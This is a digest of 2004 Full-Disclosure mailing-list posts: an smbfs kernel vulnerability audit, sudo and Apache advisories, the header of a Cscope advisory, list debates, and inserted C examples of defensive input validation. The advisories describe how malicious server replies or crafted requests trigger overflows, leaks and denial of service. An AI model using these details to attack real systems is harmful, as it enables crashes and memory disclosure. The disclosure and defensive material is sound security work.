Linux is a clone of the operating system Unix, written from scratch by Linus Torvalds with assistance from a loosely-knit team of hackers across the Net. It aims towards POSIX and Single UNIX Specification compliance.

During an audit of the smb filesystem implementation within Linux several vulnerabilities were discovered, ranging from out of bounds read accesses to kernel level buffer overflows. To exploit any of these vulnerabilities an attacker needs control over the answers of the connected smb server. This could be achieved by man in the middle attacks or by taking over the smb server with, e.g., the recently disclosed vulnerability in Samba 3.x.

While any of these vulnerabilities can easily be used as remote denial of service exploits against Linux systems, it is unclear whether a skilled local or remote attacker can use any of the possible buffer overflows for arbitrary code execution in kernel space.

Details:

[ 01 - smb_proc_read(X) malicious data count overflow ]
Affected Kernels: 2.4

When receiving the answer to a read(X) request the Linux 2.4 kernel trusts the returned data count and copies exactly that amount of bytes into the output buffer. This means any call to the read syscall on a smb filesystem could result in an overflow within kernel memory if the connected smb server returns more data than requested. While this is a trivial to exploit DOS vulnerability, it is unclear whether it can be used by a skilled attacker to execute arbitrary code.

[ 02 - smb_proc_readX malicious data offset information leak ]
Affected Kernels: 2.4

When receiving the answer to a readX request the Linux 2.4 kernel does not properly bounds check the supplied data offset. The check in place can fail because of a signedness issue. This means that a local attacker can leak kernel memory simply by issuing the read syscall on a smb filesystem when the connected server returns a data offset from outside the packet. This can of course also lead to a kernel crash when unallocated memory is accessed.

[ 03 - smb_receive_trans2 defragmentation overflow ]
Affected Kernels: 2.4

At the end of the TRANS2 defragmentation process the complete packet is moved to another place if a certain condition is true. In combination with [07] and the fact that the counters are not bounds checked before copying the data, this can result in a kernel memory overflow.

[ 04 - smb_proc_readX_data malicious data offset DOS ]
Affected Kernels: 2.6

The server supplied data offset is decremented by the header size and then used as offset within the packet. While the supplied offset is checked against an upper bound, it may have underflowed and therefore point outside the allocated memory. Any access to that memory could result in a crash.

[ 05 - smb_receive_trans2 malicious parm/data offset info leak/DOS ]
Affected Kernels: 2.4, 2.6

Both versions of the kernel do not properly bounds check the server supplied, packet based offset of the parameters/data sent. This results in smbfs copying data from memory outside the received smb fragment into the receiving buffer. This can leak kernel memory to the calling function or result in a DOS because of accesses to unallocated memory.

[ 06 - smb_recv_trans2 missing fragment information leak ]
Affected Kernels: 2.4, 2.6

The defragmentation process of TRANS2 SMB packets does not properly initialize the receiving buffer. An attacker may, e.g., send the first byte of a packet several thousand times until the received data count reaches the expected total, and so leak the rest of the uninitialised receiving buffer to the calling function.

[ 07 - smb_recv_trans2 fragment resending leads to invalid counters ]
Affected Kernels: 2.4, 2.6

The defragmentation termination condition is that at least the expected parameter count and at least the expected data count is reached. By using the fragment resending technique an attacker can increase one of those counters to an arbitrarily high value.
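The checks items [01], [02], [04] and [05] say are missing, shown side by side with the flawed offset check, as an added example that is not the kernel's smbfs code. A simplified read(X)-style reply layout is assumed (32-byte header, then a little-endian 16-bit data count and 16-bit data offset, then the payload at that offset); real SMB replies carry more fields, and the sample buffers are constructed, not captured traffic.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example, not smbfs code. Simplified reply layout (an assumption). */
#define SMB_HDR_LEN    32                  /* fixed SMB header */
#define OFF_DATA_COUNT (SMB_HDR_LEN)       /* u16 LE: bytes of file data returned */
#define OFF_DATA_OFF   (SMB_HDR_LEN + 2)   /* u16 LE: where that data starts, from packet start */
#define FIXED_LEN      (SMB_HDR_LEN + 4)   /* header plus the two fields above */

static uint16_t le16(const uint8_t *p)
{
    return (uint16_t)(p[0] | ((uint16_t)p[1] << 8));
}

/* The flawed pattern from [02]/[04]: subtract the header size first, then
 * compare. An offset smaller than the header goes negative (or underflows
 * when unsigned) and still passes. Returns 1 = accepted. Decision only;
 * no memory is touched, so it is safe to call on hostile values. */
int naive_offset_check(uint16_t data_off, size_t pkt_len)
{
    int rel = (int)data_off - SMB_HDR_LEN;        /* negative for data_off < 32 */
    return rel <= (int)(pkt_len - SMB_HDR_LEN);
}

/* Hardened validation: every server-supplied number is checked against the
 * bytes actually received and against what the client asked for, using
 * unsigned arithmetic arranged so that nothing can wrap.
 * Stores count/offset and returns 1 on success; returns 0 on any violation. */
int validate_read_response(const uint8_t *pkt, size_t pkt_len, size_t requested,
                           size_t *count_out, size_t *off_out)
{
    size_t count, off;
    if (pkt == NULL || pkt_len < FIXED_LEN) return 0;  /* fixed fields must be present */
    count = le16(pkt + OFF_DATA_COUNT);
    off   = le16(pkt + OFF_DATA_OFF);
    if (count > requested) return 0;        /* [01]: never more than was asked for */
    if (off < FIXED_LEN) return 0;          /* [02]/[04]: data cannot sit inside the header */
    if (off > pkt_len) return 0;            /* offset itself must be inside the packet */
    if (count > pkt_len - off) return 0;    /* [05]: data must end inside the packet; no off+count wrap */
    *count_out = count;
    *off_out = off;
    return 1;
}

/* Copy the file data of a validated reply into the caller's buffer.
 * Returns bytes copied, or -1 if the reply is rejected or out is too small. */
long copy_read_data(const uint8_t *pkt, size_t pkt_len, size_t requested,
                    uint8_t *out, size_t out_len)
{
    size_t count, off;
    if (!validate_read_response(pkt, pkt_len, requested, &count, &off)) return -1;
    if (count > out_len) return -1;         /* caller's buffer bounds the copy too */
    memcpy(out, pkt + off, count);
    return (long)count;
}

/* Constructed sample reply: header, fields, then the 4 payload bytes "DATA". */
enum { SAMPLE_LEN = FIXED_LEN + 4 };

void build_sample(uint8_t *buf, uint16_t count, uint16_t off)
{
    memset(buf, 0, SAMPLE_LEN);
    memcpy(buf, "\xffSMB", 4);                      /* SMB magic */
    buf[OFF_DATA_COUNT]     = (uint8_t)(count & 0xff);
    buf[OFF_DATA_COUNT + 1] = (uint8_t)(count >> 8);
    buf[OFF_DATA_OFF]       = (uint8_t)(off & 0xff);
    buf[OFF_DATA_OFF + 1]   = (uint8_t)(off >> 8);
    memcpy(buf + FIXED_LEN, "DATA", 4);
}
```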
RE: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
It's agendas like that, that segregate the information and keep it locked up in secret files that only the 3l33t you speak of have access to. A substantial technological selling point for the current governmental administration recently placed in office.

I am not disputing your professional accreditation or your more-than-real passion for information disclosure. You have your reasons, and everyone should respect that. I am just merely asking you to look at where you posted your reply. On FD.

In my last 3 years of network administration and network security, I have no need to go to any site, so you say. I just go to my inbox and download my daily FD and Bugtraq emails. It's all there, in plain text format. Maybe, if your agenda is as prominent as your reply made it sound, you should consider shutting down FD and the rest of the lists.

In the meantime, hax0rs, phr34k3rs, FXPers, carry on. I need your headaches, haxs, bots and issues. Otherwise, who knows how I'll pay my bills. And I do get bored extremely easily. And if you all feel so inclined, post your tactics and methods to a website, so I can register an account with a bogus email and educate myself.

No hard feelings n3td3v, this isn't a flame.

Jim Tuttle
Tuttle Information Systems.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of n3td3v
Sent: Wednesday, November 17, 2004 10:06 AM
To: Todd Towles; [EMAIL PROTECTED]
Subject: Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment

On Wed, 17 Nov 2004 17:53:44 +, n3td3v [EMAIL PROTECTED] wrote:

On Wed, 17 Nov 2004 11:41:20 -0600, Todd Towles [EMAIL PROTECTED] wrote:

Well, it is given that posting to FD does give a site exposure (good and bad). But I wouldn't say that FD was the cause of it... it was the illegal activity that was the cause of it. We all know SCC does some underground stuff and they post here each time they move. So... I wouldn't blame the FD list for anything.

I wouldn't use the word blame?

I think it's a good thing if Full-Disclosure is helping to catch online criminals. I don't know if you like malicious hackers and other criminals, but yeah, I dislike them. I would do anything in my power to stop online crime, from scriptkiddie stuff, to sex stuff, spam, scams, fraud, terrorism and back again. I have no space for anyone thinking they are elite and all the other hacker scene crap. It's time to clamp down on the BS that's on the net. If I was in gov, I would shut a site down that looks remotely hax0rish, even if they've done nothing wrong. All these crews and hacker groups, fk them all. The net needs zero tolerance with online crime. Govs should have the authority to close anything down because they feel like it, without needing to prove shit. I would even close IRC channels. Hackphreak on undernet looks harmless, but fk that. Close it anyway, it's time to get a tighter grip on things.

Thanks, n3td3v

Same for zone-h.org, close the crap down... f**k anything that looks remotely hax0rish. zero-tolerance!!

Thanks, n3td3v
[Full-Disclosure] [USN-28-1] sudo vulnerability
===========================================================
Ubuntu Security Notice USN-28-1          November 17, 2004
sudo vulnerability
http://www.sudo.ws/sudo/alerts/bash_functions.html
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 4.10 (Warty Warthog)

The following packages are affected:

sudo

The problem can be corrected by upgrading the affected package to version 1.6.7p5-1ubuntu4.1. In general, a standard system upgrade is sufficient to effect the necessary changes.

Details follow:

Liam Helmer discovered an input validation flaw in sudo. When the standard shell bash starts up, it searches the environment for variables with a value beginning with "()". For each of these variables a function with the same name is created, with the function body filled in from the environment variable's value.

A malicious user with sudo access to a shell script that uses bash can use this feature to substitute arbitrary commands for any non-fully-qualified programs called from the script. Therefore this flaw can lead to privilege escalation.

Source archives:

signature.asc
Description: Digital signature
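One defensive check a privileged launcher can apply before handing an environment to bash, as an added example that is neither sudo's nor bash's own code: refuse or strip environment entries that bash would import as function definitions. Two shapes are recognised: a value starting with `() {`, the prefix bash of that era imported (this matches the advisory's "()" description), and the `BASH_FUNC_<name>%%` naming that later bash releases use for exported functions (assumed from current bash behaviour, not from this notice).

```c
#include <stddef.h>
#include <string.h>

/* Added example, not sudo/bash code.
 * Returns 1 if a NAME=VALUE environment entry would be imported by bash as a
 * shell function (the USN-28-1 vector), 0 otherwise. */
int env_entry_is_function(const char *entry)
{
    const char *eq = strchr(entry, '=');
    size_t name_len;

    if (eq == NULL) return 0;                       /* not NAME=VALUE at all */
    name_len = (size_t)(eq - entry);

    /* Old-style import: the value itself starts with a function body. */
    if (strncmp(eq + 1, "() {", 4) == 0) return 1;

    /* Namespaced form used by later bash (assumption): BASH_FUNC_<name>%%=... */
    if (name_len >= 13 && strncmp(entry, "BASH_FUNC_", 10) == 0
        && strncmp(eq - 2, "%%", 2) == 0) return 1;

    return 0;
}

/* Build a sanitised, NULL-terminated environment in out (capacity cap) from
 * envp, dropping every function definition. Returns the number of entries
 * dropped, or -1 if out cannot hold the result. A launcher that wants to be
 * strict can instead refuse to run when the return value is non-zero. */
int filter_env(const char *const *envp, const char **out, size_t cap)
{
    size_t n = 0;
    int dropped = 0;

    for (; *envp != NULL; envp++) {
        if (env_entry_is_function(*envp)) { dropped++; continue; }
        if (n + 1 >= cap) return -1;               /* keep room for the terminator */
        out[n++] = *envp;
    }
    out[n] = NULL;
    return dropped;
}
```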
RE: [Full-Disclosure] IE is just as safe as FireFox
I recently spoke with some MS Security Execs and I know they wouldn't argue with this point. They know they have to improve and are working hard to do so. It would have been nice had they started this work 10 years or more ago, but thankfully they have started now.

Someone asked me to describe what I saw and heard about when I went out to Redmond to check things out recently, and all I could really say is they are ramping up fast in the backend, but it takes a while to spin things around when you have so many people using your product in so many ways. They truly have a ton of cool stuff they are working on and I personally had no understanding of how much was going on behind the doors and was quite surprised to see what I saw and how honest they are being about things internally. They aren't just standing there telling each other they are the greatest and all of this will just go away on its own. I realize from the outside it can look that way; I certainly had my own thoughts that way at times.

It was good to see and hear that the IE team is pretty raw about the edges over the issues that have occurred over the last few years (as well they should be), and internally MS sees this and knows it and is working to correct it.

One thing that was asked for is that they move faster and release tools in an initially unsupported way to get the feedback sooner so the end results can be better. Right now they have a tendency to hold things close to chest for a long time, testing and worrying and wanting to try and catch all possible issues so that they don't release something and get beaten up by a bunch of boneheads looking to hear their own name on lists and news broadcasts. This means a lot of stuff that they possibly have answers to doesn't see the light of day until a considerable time after the initial punch in the gut.

I personally would be fully happy if tools were put out that were described as "unsupported at the moment but we are working on finalizing it and releasing it in a supported manner". Then if a problem is found, feedback is given to MS properly and not an FD post of "oh my god MS sucks because they are so stupid and I figured it out because I am so L33T", etc etc ad nauseam, which this list in particular is SOOO good at. Some of the people around here shouldn't be able to breathe, they thump their own chest so hard and so much. Many of the others have no clue what they are talking about and simply reiterate anything they thought they heard that might be bad, that they heard from someone much brighter than them.

joe

--
Pro-Choice: Let me choose if I even want a browser loaded, thanks!

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Todd Towles
Sent: Tuesday, November 16, 2004 9:19 AM
To: joe; [EMAIL PROTECTED]
Subject: RE: [Full-Disclosure] IE is just as safe as FireFox

Microsoft made a bold step by changing security in SP2. It was going to break stuff... and it was stupid to see people yell about that. They told us it would, we knew it would. I am glad to see they are starting to take steps toward better systems, but Microsoft has room for improvement to say the least.
RE: [Full-Disclosure] RE: Airport x-ray software creating images of phantom weapons?
I am reading between the lines here... TSA improperly identified a weapon in a fliers bag. Instead of taking responsibility for the accident/misidentification, TSA is blaming it on the equipment. Yeah. What he said. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of David D.W. Downey Sent: Wednesday, November 17, 2004 10:35 AM To: 'Jason Coombs'; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: [Full-Disclosure] RE: Airport x-ray software creating images of phantom weapons? -Original Message- From: Jason Coombs [mailto:[EMAIL PROTECTED] Sent: Tuesday, November 16, 2004 12:09 AM To: [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Airport x-ray software creating images of phantom weapons? My flight into Midway airport, Chicago, just sat on the runway for nearly two hours tonight because of a potential security breach in the terminal, described here: http://www.nbc5.com/news/3921217/detail.html?z=dpdpswid=22659 94dppid=65194 A Transportation Security Administration representative at Midway airport confirmed for me that the suspicious object displayed on the computerized x-ray machine may have been a phantom image similar to the one in Miami on November 13th: Software glitch in security scanner at Miami airport 'projected the image of a weapon' that didn't exist http://abclocal.go.com/ktrk/news/nat_world/111304_APnat_airport.html OK, let's stop here for a moment. Before we get to the digitizing of pictures, let's look at something here. According to the story, the man's bag had the image of a grenade in it. Yet, he was able to move away from the screening area, sit down at a set of seats _with_ his bag, then move away from there to the food courts with a friend all without being stopped, watched, tailed, or any other security measures taken regarding him. During this time, the security forces protecting the airport are informed of the potential threat, start their sweeps and find the gentleman in the food court. 
Let me ask a couple of questions, having spent many years as a soldier, that bother me to the extreme regarding this situation.

- WHY was this man allowed out of the screening area in the first place?
- WHY was there no security force on either side of the mouth of the opening out of the security checkpoint?
- WHY was the security force not immediately alerted to the potential threat BEFORE the man left the checkpoint?
- WHY was this man allowed to move to a set of seats _having passed the security checks_ where this supposed 'ghost image' was seen?
- WHY was this man then allowed to roam freely _within_ the airport to the food court?
- WHY did the security forces NOT have a monitoring device or similar human presence watching this man?

Notice nothing of what I have said touches on the electronic technologies used to examine baggage, personnel, or passengers, such as what caused this apparent ghost image. This is purely monitoring, notification, response, and crisis management that I'm speaking of. We have numerous holes within the security protocols at this airport that this man slipped through, without even touching on the original gist of this thread. Add on the complaints Jason brought up and we have a much larger security issue in this country than most people suspect. Is it cause for panic? Hardly. Is it cause for a very serious review and a VERY firm set of response policies created? Yes, definitely.

Just my 2 cents. :-)

--
David D.W. Downey

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] WiFi question
Could also be RF interference. One of my coworkers tracked down a particularly interesting problem with motion sensor lights. Turns out the motion sensors worked at the 240MHz range, which has resonance at 2.4GHz, or something like that. Hence every time the motion sensor worked, it would spew what the wardriving (site survey) apps thought was a zillion different access points with widely varying MAC addresses. I would have thought it was a FAKEAP program also. I would assume the same could happen with other interference. Having a common SSID would seem to indicate this is not the problem, but just thought I'd mention it.

Mark Lachniet

-----Original Message-----
From: KF_lists [mailto:[EMAIL PROTECTED]
Sent: Wednesday, November 17, 2004 10:21 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] WiFi question

fake ap
http://bsdvault.net/bsdfap.txt
http://www.blackalchemy.to/project/fakeap/

-KF

[EMAIL PROTECTED] wrote:

List, I'm an expert in nothing so when I saw this I had to ask, as I'm sure there's someone out there that is a WiFi expert. Google has found no answer so here goes.

Last night we saw a new access point appear. No problems, it's an ad-hoc network so it's someone's machine with XP on, configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4th. Then the first two drop off; this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I can't crack 'cos I don't have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell it's coming from this office (the IT dept), basing that assumption on signal strength.

Anyone seen any tools that do this?
I would love a little hand-held gadget that would help me find it (like the scanner in Alien!)

Answers on a post card :)

Colin.

**
This e-mail is confidential and may contain privileged information. If you are not the addressee or if you have received the e-mail in error, it may be unlawful for you to read, copy, distribute, disclose or otherwise use the information which it contains. Under these circumstances, please notify us immediately by returning this mail to '[EMAIL PROTECTED]' and deleting this e-mail from your system. Any views expressed by an individual within this e-mail do not necessarily reflect the views of Cadbury Schweppes Plc or its subsidiaries. Cadbury Schweppes Plc will not be bound by any agreement entered into as a result of this email, unless its intention is clearly evidenced in the body of the email. Whilst we have taken reasonable steps to ensure that this e-mail and attachments are free from viruses, recipients are advised to subject this mail to their own virus checking, in keeping with good computing practice. Please note that email received by Cadbury Schweppes Plc or its subsidiaries may be monitored in accordance with the prevailing law in the United Kingdom.
**

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] MDKSA-2004:135 - Updated apache2 packages fix request DoS
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandrakelinux Security Update Advisory
___

Package name: apache2
Advisory ID: MDKSA-2004:135
Date: November 15th, 2004
Affected versions: 10.0, 10.1, 9.2
__

Problem Description:

A vulnerability in apache 2.0.35-2.0.52 was discovered by Chintan Trivedi; he found that by sending a large amount of specially-crafted HTTP GET requests, a remote attacker could cause a Denial of Service on the httpd server. This vulnerability is due to improper enforcement of the field length limit in the header-parsing code.

The updated packages have been patched to prevent this problem.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0942
http://xforce.iss.net/xforce/xfdb/17930
__

Updated Packages:
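As an added example (not Apache's or Mandrakesoft's code), a minimal request-header reader that shows the difference between limiting each physical line and limiting the whole field: a field folded over several continuation lines passes the first check and is rejected by the second. The advisory does not spell out the crafted input; this example assumes a folded field is the relevant case, and the limit value, field names and payload are constructed.

```c
/* Added example, not Apache's code: enforcing a request-header field length
 * limit across folded continuation lines. */
#include <stdio.h>
#include <string.h>

/* Demo limit; constructed here. Apache's real limit is a separate setting. */
#define DEMO_FIELD_LIMIT 256

/* Walk a header block: CRLF-terminated lines, ended by an empty line.
 * A line beginning with SP or HT continues the previous field (RFC 2616
 * LWS folding). With per_field != 0 the limit applies to the folded field
 * as a whole; with per_field == 0 only to each physical line, which lets a
 * field grow without bound as long as every line stays short.
 * Returns the number of logical fields, or -1 if the limit is exceeded or
 * a continuation line has no field to continue. */
static int scan_header_block(const char *hdr, size_t limit, int per_field)
{
    const char *p = hdr;
    size_t field_len = 0;
    int fields = 0, in_field = 0;

    while (*p != '\0') {
        const char *eol = strstr(p, "\r\n");
        size_t line_len = eol ? (size_t)(eol - p) : strlen(p);

        if (line_len == 0)                  /* blank line: end of headers */
            break;
        if (line_len > limit)               /* oversize physical line: both modes reject */
            return -1;
        if (p[0] == ' ' || p[0] == '\t') {  /* folded continuation line */
            if (!in_field)
                return -1;
            field_len += line_len;
        } else {                            /* start of a new field */
            field_len = line_len;
            in_field = 1;
            fields++;
        }
        if (per_field && field_len > limit) /* the check the weak mode lacks */
            return -1;
        p = eol ? eol + 2 : p + line_len;
    }
    return fields;
}

/* Weak enforcement: per physical line only. */
int count_fields_weak(const char *hdr, size_t limit)
{
    return scan_header_block(hdr, limit, 0);
}

/* Correct enforcement: per logical (unfolded) field. */
int count_fields_strict(const char *hdr, size_t limit)
{
    return scan_header_block(hdr, limit, 1);
}

/* Build a constructed header block: one ordinary field plus one field folded
 * over `lines` continuation lines of `width` bytes each. Returns the total
 * length written, or -1 if `out` is too small. */
int build_folded_headers(char *out, size_t outlen, int lines, int width)
{
    int n = snprintf(out, outlen, "Host: example.test\r\nX-Long: v\r\n");
    size_t used;

    if (n < 0 || (size_t)n >= outlen)
        return -1;
    used = (size_t)n;
    for (int i = 0; i < lines; i++) {
        /* room for " " + payload + CRLF now, and final CRLF + NUL later */
        if (used + 1 + (size_t)width + 2 + 3 > outlen)
            return -1;
        out[used++] = ' ';
        memset(out + used, 'a', (size_t)width);
        used += (size_t)width;
        out[used++] = '\r';
        out[used++] = '\n';
    }
    out[used++] = '\r';
    out[used++] = '\n';
    out[used] = '\0';
    return (int)used;
}

int main(void)
{
    char buf[4096];
    int len = build_folded_headers(buf, sizeof buf, 3, 100);

    printf("header block: %d bytes\n", len);
    printf("per-line limit  %d: %d\n", DEMO_FIELD_LIMIT, count_fields_weak(buf, DEMO_FIELD_LIMIT));
    printf("per-field limit %d: %d\n", DEMO_FIELD_LIMIT, count_fields_strict(buf, DEMO_FIELD_LIMIT));
    return 0;
}
```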
Re: FW: [Full-Disclosure] Shadowcrew Grand Jury Indictment
On Wed, 17 Nov 2004, n3td3v wrote:
...
If I was in gov, I would shut a site down that looks remotely hax0rish, even if they've done nothing wrong. All these crews and hacker groups, fk them all. The net needs zero tolerance with online crime. Govs should have the authority to close anything down because they feel like it, without needing to prove shit. I would even close IRC channels. Hackphreak on undernet looks harmless, but fk that. Close it anyway, it's time to get a tighter grip on things.
...
Same for zone-h.org, close the crap down.. f**k anything that looks remotely hax0rish.

Unfortunately, the US Government operates under the auspices of a small document called The Constitution, and a little concept called Common Law. Now, I know that you trendy kids call things like that "quaint" (I believe that's what our new Attorney General calls things like the Geneva Convention. See http://www.telegraph.co.uk/news/main.jhtml?xml=/news/2004/06/13/wguan13.xml&sSheet=/news/2004/06/13/ixworld.html) but fortunately for the rest of us, presumption of innocence remains the standard of the land. If you small-minded totalitarians don't like that sacred principle, get the hell out of the US. We don't need your kind. Move to some Banana Republic where they change the rules all the time in the face of 1000 years of tradition and philosophy and the Blood of Patriots who died to protect these rights.

"Zero tolerance." What will these doofuses think of next? I bet they start up a cult of personality around the nation's leader, including a new salute borrowed from the Romans.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] IE is just as safe as FireFox
Well MS isn't about to produce code to configure Macs and other OSs, wouldn't you say that makes sense? They certainly aren't the experts in writing code for controlling those platforms and I don't see why they would want to. On the flip side there are other companies doing so. Take a look at companies like Centrify and Vintela and what they are doing for *nix / *bsd platforms and integration into Active Directory specifically for SECURE authentication/authorization and policy management in a corporate environment. So once your favorite Solaris box can be configured via AD policies, does it make it an MS toy as well?

joe

--
Pro-Choice: Let me choose if I even want a browser loaded, thanks!

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of stephane nasdrovisky
Sent: Tuesday, November 16, 2004 8:39 AM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] IE is just as safe as FireFox

Unfortunately, MS group policy does not handle Mac, Solaris, Linux, ... only MS toys can be configured using this.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
this stuff is totally real to the max. my cousin's former roommate's neighbor's uncle jessie once worked for the secret service and he told me it's completely standard protocol to have the mission impossible theme in the background. also the strike tag is used exclusively by the secret service.

From: Curt Purdy [EMAIL PROTECTED]
To: 'Insecure' [EMAIL PROTECTED], 'Danny' [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] controversial shadowcrew site hacked by secret service?
Date: Wed, 17 Nov 2004 04:23:52 -0600

Danny wrote:
The Secret Service, or any other government enforcement agency would not condone, promote, or participate in website defacement activities. I know some of you have little faith in these agencies, but, one thing is for sure, they would never stoop this low.

Insecure replied:
Even when the Secret Service admits that they took over the site and put up their own page, you don't believe it? Must be nice to have such blind faith in the integrity of your government enforcement agencies.

Duh... I don't know whether it's you folks who doomed us to another 4 years of hell trying to justify your own blind faith or what, but it's time you all woke up to reality. Good Morning America! Our government is no more (as) ethical as any other country. Whether it is our agents murdering a South American dictator we don't happen to like, or our agents defacing a cracker's site, it happens. Obviously you slept through the weeks of cyberwar our (paid) hackers fought with China's (paid) hackers after they downed our jet a while back. It was China who finally called a truce in their official press. Sorry to give you people the bad news, but Bambi died a while ago. It's the wild west in 1800 and there is no law. If you want to survive, you better have a hired gun and we go for $300/hour these days. At least those of us who have met the black hat on main street at 50 paces at high noon and walked away to tell about it.

Curt Purdy CISSP, GSEC, MCSE+I, CNE, CCDA
Information Security Engineer
DP Solutions

- If you spend more on coffee than on IT security, you will be hacked. What's more, you deserve to be hacked.
-- former White House cybersecurity czar Richard Clarke

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RE: Airport x-ray software creating images of phantom weapons?
-----Original Message-----
From: Jason Coombs [mailto:[EMAIL PROTECTED]
Sent: Tuesday, November 16, 2004 12:09 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Airport x-ray software creating images of phantom weapons?

My flight into Midway airport, Chicago, just sat on the runway for nearly two hours tonight because of a potential security breach in the terminal, described here:
http://www.nbc5.com/news/3921217/detail.html?z=dp&dpswid=2265994&dppid=65194

A Transportation Security Administration representative at Midway airport confirmed for me that the suspicious object displayed on the computerized x-ray machine may have been a phantom image similar to the one in Miami on November 13th:

Software glitch in security scanner at Miami airport 'projected the image of a weapon' that didn't exist
http://abclocal.go.com/ktrk/news/nat_world/111304_APnat_airport.html

OK, let's stop here for a moment. Before we get to the digitizing of pictures, let's look at something here. According to the story, the man's bag had the image of a grenade in it. Yet, he was able to move away from the screening area, sit down at a set of seats _with_ his bag, then move away from there to the food courts with a friend, all without being stopped, watched, tailed, or any other security measures taken regarding him. During this time, the security forces protecting the airport are informed of the potential threat, start their sweeps and find the gentleman in the food court.

Let me ask a couple of questions, having spent many years as a soldier, that bother me to the extreme regarding this situation.

- WHY was this man allowed out of the screening area in the first place?
- WHY was there no security force on either side of the mouth of the opening out of the security checkpoint?
- WHY was the security force not immediately alerted to the potential threat BEFORE the man left the checkpoint?
- WHY was this man allowed to move to a set of seats _having passed the security checks_ where this supposed 'ghost image' was seen?
- WHY was this man then allowed to roam freely _within_ the airport to the food court?
- WHY did the security forces NOT have a monitoring device or similar human presence watching this man?

Notice nothing of what I have said touches on the electronic technologies used to examine baggage, personnel, or passengers, such as what caused this apparent ghost image. This is purely monitoring, notification, response, and crisis management that I'm speaking of. We have numerous holes within the security protocols at this airport that this man slipped through, without even touching on the original gist of this thread. Add on the complaints Jason brought up and we have a much larger security issue in this country than most people suspect. Is it cause for panic? Hardly. Is it cause for a very serious review and a VERY firm set of response policies created? Yes, definitely.

Just my 2 cents. :-)

--
David D.W. Downey

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] WiFi question
A very good point indeed Mark; one that shouldn't be dismissed even WITH common SSIDs. Other technology clashing with WiFi certainly isn't new... in fact it's getting worse! Besides motion sensors, also look for wireless phones, security systems (like ADT's window/door systems - they use wireless to communicate with some systems), things like that. With the amount of wireless technology out there, it's becoming less and less common to find unaffected WiFi.

--
Peace.
~G

On Wed, 17 Nov 2004 12:41:44 -0500, Lachniet, Mark [EMAIL PROTECTED] wrote:

Could also be RF interference. One of my coworkers tracked down a particularly interesting problem with motion sensor lights. Turns out the motion sensors worked at the 240MHz range, which has resonance at 2.4GHz, or something like that. Hence every time the motion sensor worked, it would spew what the wardriving (site survey) apps thought was a zillion different access points with widely varying MAC addresses. I would have thought it was a FAKEAP program also. I would assume the same could happen with other interference. Having a common SSID would seem to indicate this is not the problem, but just thought I'd mention it.

Mark Lachniet

-----Original Message-----
From: KF_lists [mailto:[EMAIL PROTECTED]
Sent: Wednesday, November 17, 2004 10:21 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] WiFi question

fake ap
http://bsdvault.net/bsdfap.txt
http://www.blackalchemy.to/project/fakeap/

-KF

[EMAIL PROTECTED] wrote:

List, I'm an expert in nothing so when I saw this I had to ask, as I'm sure there's someone out there that is a WiFi expert. Google has found no answer so here goes.

Last night we saw a new access point appear. No problems, it's an ad-hoc network so it's someone's machine with XP on, configured for their home W-LAN probably. Running Netstumbler shows more on it though. You get 2 Access Points showing this ESSID for a few seconds. Then you get a 3rd, then a 4th.
Then the first two drop off; this repeats forever. Always using a different MAC address when a new AP appears. The APs are all WEP enabled (which I can't crack 'cos I don't have the savvy or the tools :) ) and this goes on forever. The MACs are all from different pools (i.e. assigned to different manufacturers) so the only conclusion is that they are all spoofed MACs. I have walked around the office and as far as I can tell it's coming from this office (the IT dept), basing that assumption on signal strength.

Anyone seen any tools that do this? I would love a little hand-held gadget that would help me find it (like the scanner in Alien!)

Answers on a post card :)

Colin.

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] RX171104 Cscope v15.5 and minors - symlink vulnerability - advisory, exploit and patch.
| REXOTEC(dot)COM ### |
|=-=[ ADV RX171104 - Cscope :: Race condition on temporary file ]-=|
|
|=---[ - INFORMATION `--|

VulnDiscovery: 2003/05/21
Release Date : 2004/11/17
Author : Gangstuck / Psirac [EMAIL PROTECTED]
Application : Cscope
Affected : All versions (last one is cscope-15.5)
Platforms : Linux, SCO, SunOS/Solaris, ...
Risk : Critical
Severity : Allows a local user to compromise the filesystem.
Vendor : http://cscope.sourceforge.net/
Reference : http://www.rexotec.com/advisory/RX171104.html
Status : vendor has just been notified.

|=---[ - SUMMARY OVERVIEW `--|

